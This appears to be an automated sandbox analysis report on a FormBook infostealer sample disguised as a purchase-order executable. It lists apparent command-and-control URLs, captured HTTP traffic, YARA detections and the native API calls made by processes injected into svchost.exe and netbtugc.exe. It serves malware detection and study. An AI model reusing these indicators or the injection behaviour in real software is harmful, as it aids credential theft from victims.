6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 22 Sep 2024 15:36:37 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: fALrZoEgBHis.exe, 00000006.00000002.2709976615.0000000005433000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kexweb.top
            Source: fALrZoEgBHis.exe, 00000006.00000002.2709976615.0000000005433000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kexweb.top/3bdq/
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: netbtugc.exe, 00000005.00000002.2706051266.000000000360E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000005.00000003.1954629588.0000000008575000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000005.00000002.2710234659.0000000004DC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2711751819.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000003CF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
            Source: netbtugc.exe, 00000005.00000002.2711918868.000000000859E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000005.00000002.2710234659.0000000004778000.00000004.10000000.00040000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.00000000036A8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2063649415.000000003C2D8000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.elsupertodo.net/2jit/?OXVx9=WNjT&H0QP6=iS4P4oRSl8BXKzGDEvFFA2xLKhJOP7i6JXAZlPSQukWhX6ryY
            Source: netbtugc.exe, 00000005.00000002.2710234659.0000000004DC0000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000005.00000002.2711751819.0000000006AD0000.00000004.00000800.00020000.00000000.sdmp, fALrZoEgBHis.exe, 00000006.00000002.2707985910.0000000003CF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2708003926.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1665671367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2708182571.0000000003830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1666062406.0000000003890000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2705527913.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2709976615.00000000053D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1666620197.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2707473694.0000000004430000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: PO# Q919240.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C063 NtClose,2_2_0042C063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B60 NtClose,LdrInitializeThunk,2_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039735C0 NtCreateMutant,LdrInitializeThunk,2_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974340 NtSetContextThread,2_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03974650 NtSuspendThread,2_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972B80 NtQueryInformationFile,2_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BA0 NtEnumerateValueKey,2_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BF0 NtAllocateVirtualMemory,2_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972BE0 NtQueryValueKey,2_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AB0 NtWaitForSingleObject,2_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AD0 NtReadFile,2_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972AF0 NtWriteFile,2_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F90 NtProtectVirtualMemory,2_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FB0 NtResumeThread,2_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FA0 NtQuerySection,2_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972FE0 NtCreateFile,2_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F30 NtCreateSection,2_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972F60 NtCreateProcessEx,2_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E80 NtReadVirtualMemory,2_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EA0 NtAdjustPrivilegesToken,2_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972EE0 NtQueueApcThread,2_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972E30 NtWriteVirtualMemory,2_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DB0 NtEnumerateKey,2_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972DD0 NtDelayExecution,2_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D10 NtMapViewOfSection,2_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D00 NtSetInformationFile,2_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972D30 NtUnmapViewOfSection,2_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CA0 NtQueryInformationToken,2_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CC0 NtQueryVirtualMemory,2_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972CF0 NtOpenProcess,2_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C00 NtQueryInformationProcess,2_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972C60 NtCreateKey,2_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973090 NtSetValueKey,2_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973010 NtOpenDirectoryObject,2_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039739B0 NtGetContextThread,2_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D10 NtOpenProcessToken,2_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03973D70 NtOpenThread,2_2_03973D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB4340 NtSetContextThread,LdrInitializeThunk,5_2_03AB4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB4650 NtSuspendThread,LdrInitializeThunk,5_2_03AB4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_03AB2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_03AB2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_03AB2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2B60 NtClose,LdrInitializeThunk,5_2_03AB2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2AF0 NtWriteFile,LdrInitializeThunk,5_2_03AB2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2AD0 NtReadFile,LdrInitializeThunk,5_2_03AB2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2FB0 NtResumeThread,LdrInitializeThunk,5_2_03AB2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2FE0 NtCreateFile,LdrInitializeThunk,5_2_03AB2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2F30 NtCreateSection,LdrInitializeThunk,5_2_03AB2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_03AB2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_03AB2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_03AB2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2DD0 NtDelayExecution,LdrInitializeThunk,5_2_03AB2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_03AB2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_03AB2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_03AB2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2C60 NtCreateKey,LdrInitializeThunk,5_2_03AB2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_03AB2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB35C0 NtCreateMutant,LdrInitializeThunk,5_2_03AB35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB39B0 NtGetContextThread,LdrInitializeThunk,5_2_03AB39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2B80 NtQueryInformationFile,5_2_03AB2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2AB0 NtWaitForSingleObject,5_2_03AB2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2FA0 NtQuerySection,5_2_03AB2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2F90 NtProtectVirtualMemory,5_2_03AB2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2F60 NtCreateProcessEx,5_2_03AB2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2EA0 NtAdjustPrivilegesToken,5_2_03AB2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2E30 NtWriteVirtualMemory,5_2_03AB2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2DB0 NtEnumerateKey,5_2_03AB2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2D00 NtSetInformationFile,5_2_03AB2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2CF0 NtOpenProcess,5_2_03AB2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2CC0 NtQueryVirtualMemory,5_2_03AB2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB2C00 NtQueryInformationProcess,5_2_03AB2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB3090 NtSetValueKey,5_2_03AB3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB3010 NtOpenDirectoryObject,5_2_03AB3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB3D10 NtOpenProcessToken,5_2_03AB3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03AB3D70 NtOpenThread,5_2_03AB3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03318F50 NtDeleteFile,5_2_03318F50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03318E60 NtReadFile,5_2_03318E60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03318CF0 NtCreateFile,5_2_03318CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03319160 NtAllocateVirtualMemory,5_2_03319160
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 5_2_03319000 NtClose,5_2_03319000
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044EB5F0_2_0044EB5F
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\PO# Q919240.exeCode function: 0_2_042656700_2_04265670
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181132_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9C32_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040F9BC2_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022092_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004022102_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162FE2_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162BC2_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004163032_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040FBE32_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040DC632_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402DC02_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042E6532_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A003E62_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E3F02_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA3522_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C02C02_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E02742_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A001AA2_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F41A22_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F81CC2_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA1182_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039301002_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C81582_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D20002_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C02_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039647502_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039407702_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C6E02_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A005912_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039405352_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EE4F62_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E44202_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F24462_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F6BD72_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB402_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA802_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0A9A62_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A02_2_039429A0
